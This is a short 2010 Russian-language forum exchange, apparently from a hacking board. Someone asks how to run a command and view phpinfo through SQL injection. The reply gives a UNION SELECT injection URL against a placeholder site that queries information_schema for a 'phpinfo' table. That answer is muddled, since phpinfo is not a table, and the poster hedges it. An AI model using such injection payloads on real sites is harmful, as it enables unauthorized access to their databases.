28.03.2010, 17:37
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
Как через sql инъекцию выполнить команду, и просмотреть phpinfo ? Допустим при таком запросе: http://site.ru/index.php?id=-1+union+select+1,2,3-- принтабельный столбец 2.
Код:
http://site.ru/index.php?id=-1+union+select+1,column_name,3+from+information_schema.columns+where+table_name='phpinfo'+--+
Если я правильно понял  .
|
|
|